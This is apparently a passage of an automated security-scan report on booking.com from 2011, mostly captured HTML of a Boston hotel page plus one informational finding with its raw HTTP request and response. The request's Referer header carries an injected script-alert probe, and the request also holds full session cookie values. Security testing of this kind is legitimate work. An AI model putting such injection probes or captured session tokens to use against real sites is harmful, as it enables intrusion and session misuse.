<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
enter=42.3482287447141%2c-71.0785603523254&zoom=14&size=215x150&sensor=false&language=en&client=gme-booking&signature=8hFN_WewIMzyC0y1iNDnIokf8qs="


class="hotel
show_map

exp_smallimg">


<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" alt="Current hotel" title="Copley Square Hotel" />

</a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://r.bstatic.com/images/hotel/square40/283/2833172.jpg"
width="30"
height="30"
alt="hotel Radisson Hotel Boston, Boston"
/>

</a>
...[SNIP]...
<a href="/hotel/us/radison-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://s.bstatic.com/images/hotel/square40/169/1691256.jpg"
width="30"
height="30"
alt="hotel Copley Square Hotel, Boston"
/>

</a>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
</strong>"
>
<img
class="thumb hotel"
src="http://s.bstatic.com/images/hotel/square40/224/2240322.jpg"
width="30"
height="30"
alt="hotel Newbury Guest House, Boston"
/>

</a>
...[SNIP]...
<a href="/hotel/us/newbury-guest-house.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_gb_h&title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com&annotation=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees" id="gb" title="Bookmark this hotel page with Google Bookmarks" name="on Google">Google</a>
</li>
<li>


<a rel="250 nofollow" class="jq_tooltip share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Copley Square Hotel " id="t" data-shorturl="http://www.booking.com/hotel/us/copley-square.html?label=socnet_t_h&aid=339529" title="Share a link to this hotel page on Twitter" name="on Twitter">Twitter</a>
...[SNIP]...
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.bebo.com/c/share?Url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_b_h&TitleCopley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com" id="b" title="Share a link to this hotel page on Bebo" name="on Bebo">Bebo</a>
</li>
<li>
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://reddit.com/submit?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_r_h&title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com" id="r" title="Share a link to this hotel page on Reddit" name="on Reddit">Reddit</a>
</li>
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://delicious.com/save?url=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_d_h&title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com&notes=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees" id="d" title="Bookmark this hotel page with Delicious" name="on Delicious">Delicious</a>
...[SNIP]...
<li class="cl">
<a rel="250 nofollow" class="jq_tooltip" target="_blank" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.en.html%3Faid%3D335591%26label%3Dsocnet_my_h&t=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com&l=3&c=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees" id="my" title="Share a link to this hotel page on MySpace" name="on MySpace">MySpace</a>
...[SNIP]...
</style>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/169/1691256.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/169/1691256.jpg' />"


style="background-position: 0 -400px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/435/4354432.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354432.jpg' />"


style="background-position: 0 -480px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354438.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354438.jpg' />"


style="background-position: 0 -520px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/168/1685102.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685102.jpg' />"


style="background-position: 0 -80px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/168/1685101.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685101.jpg' />"


style="background-position: 0 -40px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/168/1685107.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' />"


style="background-position: 0 -240px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685109.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685109.jpg' />"


style="background-position: 0 -280px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354499.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354499.jpg' />"


style="background-position: 0 -680px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/168/1685105.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/168/1685105.jpg' />"


style="background-position: 0 -200px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354486.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354486.jpg' />"


style="background-position: 0 -600px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/435/4354483.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/435/4354483.jpg' />"


style="background-position: 0 -560px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/168/1685100.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/168/1685100.jpg' />"


style="background-position: 0 0;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/435/4354503.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354503.jpg' />"


style="background-position: 0 -720px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685104.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685104.jpg' />"


style="background-position: 0 -160px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/168/1685111.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/168/1685111.jpg' />"


style="background-position: 0 -320px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://s.bstatic.com/images/hotel/max300/435/4354427.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://s.bstatic.com/images/hotel/max300/435/4354427.jpg' />"


style="background-position: 0 -440px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685112.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685112.jpg' />"


style="background-position: 0 -360px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://q.bstatic.com/images/hotel/max300/435/4354491.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354491.jpg' />"


style="background-position: 0 -640px;"

onclick="return false;"
>
</a>


<a
target="_blank"
href="http://r.bstatic.com/images/hotel/max300/168/1685103.jpg"
class="jq_tooltippex hotel_thumbs_sprite"

title="<img src='http://r.bstatic.com/images/hotel/max300/168/1685103.jpg' />"


style="background-position: 0 -120px;"

onclick="return false;"
>
</a>
...[SNIP]...
</b> represents the hotel's performance in areas such as cleanliness, comfort, value for money etc. ">98.88% Hotel reliability <img src="http://r.bstatic.com/static/img/info.png" style="margin-left: 3px; margin-bottom: -3px;" /></h6>
...[SNIP]...
<span><img src="http://s.bstatic.com/static/img/transparent.png" width="1" height="1" alt="" />When would you like to stay at Copley Square Hotel?</span>
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
<a class="calendar reqJS inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="use_sprites icon_calendar" /></a>
...[SNIP]...
</strong>">
<img src="http://r.bstatic.com/images/hotel/square90/168/1685102.jpg" width="60" height="60" alt="Queen Room"/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625505" class="togglelink jqrt " title="">
...[SNIP]...
<div class="roomDefaultUse">


<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />


</div>
...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625505">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685107.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' /><br /><strong>Queen Room</strong>"

alt="Copley Square Hotel: Queen Room"

/>


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685102.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685102.jpg' /><br /><strong>Queen Room</strong>"

alt="Copley Square Hotel: Queen Room"

/>



<p>
...[SNIP]...
</strong>">
<img src="http://r.bstatic.com/images/hotel/square90/435/4354427.jpg" width="60" height="60" alt="Premier Double Room with Two Double Beds"/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625501" class="togglelink jqrt " title="">
...[SNIP]...
<div class="roomDefaultUse">


<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />


</div>
...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625501">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/435/4354427.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/435/4354427.jpg' /><br /><strong>Premier Double Room with Two Double Beds</strong>"

alt="Copley Square Hotel: Premier Double Room with Two Double Beds"

/>


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685107.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' /><br /><strong>Premier Double Room with Two Double Beds</strong>"

alt="Copley Square Hotel: Premier Double Room with Two Double Beds"

/>



<p>
...[SNIP]...
</strong>">
<img src="http://q.bstatic.com/images/hotel/square90/435/4354432.jpg" width="60" height="60" alt="Copley Square Suite"/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625508" class="togglelink jqrt " title="">
...[SNIP]...
<div class="roomDefaultUse">


<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />


</div>
...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625508">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://q.bstatic.com/images/hotel/square90/435/4354432.jpg"
title="<img src='http://q.bstatic.com/images/hotel/max300/435/4354432.jpg' /><br /><strong>Copley Square Suite</strong>"

alt="Copley Square Hotel: Copley Square Suite"

/>



<p>
...[SNIP]...
</strong>">
<img src="http://r.bstatic.com/images/hotel/square90/168/1685101.jpg" width="60" height="60" alt=""/><img src="http://q.bstatic.com/static/img/icons/imgplus.gif" alt="" style="position:absolute; top:47px; left:47px;" />


<a href="#RD5625504sor" class="togglelink jqrt" title="">
...[SNIP]...
<div class="roomDefaultUse">

<img src="http://s.bstatic.com/static/img/transparent.png"
class="occsprite max2 jq_tooltip"
width="43"
height="10"


title="Standard occupancy: 2"

alt=""
/>


</div>
...[SNIP]...
<div class="blocktoggle" id="blocktoggleRD5625504sor">


<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685101.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685101.jpg' /><br /><strong></strong>"

alt="Copley Square Hotel: "

/>



<img
class="hotel jq_tooltippex"
width="90"
height="90"
src="http://r.bstatic.com/images/hotel/square90/168/1685107.jpg"
title="<img src='http://s.bstatic.com/images/hotel/max300/168/1685107.jpg' /><br /><strong></strong>"

alt="Copley Square Hotel: "

/>



<p>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
General
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Activities
</span>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Services
</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>
Internet</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""

/>
Parking</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Check in</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Check out</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Cancellation / Prepayment</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Children and extra beds</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Pets</span>
...[SNIP]...
<span><img
src="http://s.bstatic.com/static/img/transparent.png"
width="1"
height="1"
alt=""
/>
Accepted credit cards</span>
...[SNIP]...
<a title="Ready to book? Choose a room." id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Choose a room."
title="Go to the top of the page"
class="use_sprites icon_top"
/>



Choose a room.


</a>
...[SNIP]...
<div style="text-align:center;padding:3em;"><img src="http://r.bstatic.com/static/img/loading_filterbox.gif" alt="loading..." /></div>
...[SNIP]...
<a title="Ready to book? Choose a room." id="top_link" href="#availability_target" onclick="blockdisplay(1);"><img src="http://s.bstatic.com/static/img/transparent.png"
alt="Ready to book? Choose a room."
title="Go to the top of the page"
class="use_sprites icon_top"
/>



Choose a room.


</a>
...[SNIP]...
</strong>"
href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
>

<img class="hotelImg" src="http://q.bstatic.com/images/hotel/square60/191/1916558.jpg" width="60" height="60" title="The Liberty Hotel, A Luxury Collection Hotel" alt="hotel" align="left" />
</a>
...[SNIP]...
</strong>"
href="/hotel/us/westin-copley-place.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
>

<img class="hotelImg" src="http://r.bstatic.com/images/hotel/square60/131/1314320.jpg" width="60" height="60" title="Westin Copley Place" alt="hotel" align="left" />
</a>
...[SNIP]...
</strong>"
href="/hotel/us/harborside.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
>

<img class="hotelImg" src="http://s.bstatic.com/images/hotel/square60/577/577726.jpg" width="60" height="60" title="Harborside Inn" alt="hotel" align="left" />
</a>
...[SNIP]...
<span>
<img
src="http://s.bstatic.com/static/img/transparent.png"
width="25"
height="17"
alt=""
title="previous hotel"
/>
previous hotel
</span>
...[SNIP]...
<a
href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"
><img
src="http://s.bstatic.com/static/img/transparent.png"
width="25"
height="17"
alt=""
title="next hotel"
/>
next hotel</a>
...[SNIP]...
</span>
<a id="share_popup_fb" class="fb_share" rel="250 nofollow" target="_blank" href="http://www.facebook.com/share.php?u=http://www.booking.com/hotel/us/copley-square.html?label=socnet_fb_h_shp&aid=339528" title="Share a link to this hotel page on Facebook" name="on Facebook"><img class="share_popup_img use_sprites icon_social_media_fb" src="http://s.bstatic.com/static/img/transparent.png" /></a>
<a rel="250 nofollow" id="share_popup_t" class="share_t" target="_blank" href="http://twitter.com/intent/tweet?text=Check out this hotel! Copley Square Hotel" id="t" title="Share a link to this hotel page on Twitter" data-shorturl="http://www.booking.com/hotel/us/copley-square.html?label=socnet_t_h&aid=339529" name="on Twitter"><img class="share_popup_img use_sprites icon_social_media_twitter" src="http://s.bstatic.com/static/img/transparent.png" /></a>
...[SNIP]...
3D339530;title=Copley%20Square%20Hotel, Boston - 49 Guest%20reviews on Booking.com;notes=Check out Copley%20Square%20Hotel on Booking.com for: Best Price Guaranteed, 49 Guest reviews, No booking fees"><img class="share_popup_img use_sprites icon_social_media_mailafriend" src="http://s.bstatic.com/static/img/transparent.png" /></a>
</span>

<div id="share_popup_close"><img class="share_popup_img use_sprites icon_share_popup_close" src="http://s.bstatic.com/static/img/transparent.png" /></div>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<img src="http://s.bstatic.com/static/img/marker-hotel-blue.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-hotel-grey.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-hotel-orange-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-airport-large.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark.png" style="display: none;" />
<img src="http://s.bstatic.com/static/img/marker-landmark-large.png" style="display: none;" />
<img src="http://r.bstatic.com/static/img/marker-city.png" style="display: none;" />
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...

19.182. http://www.booking.com/index.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/index.en.html" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<!--[if lte IE 8]>
...[SNIP]...
</style>


<link rel="stylesheet" type="text/css" href="http://r.bstatic.com/static/css/landingpage.1191.css" />


<title>
...[SNIP]...
<div id="top" class="">


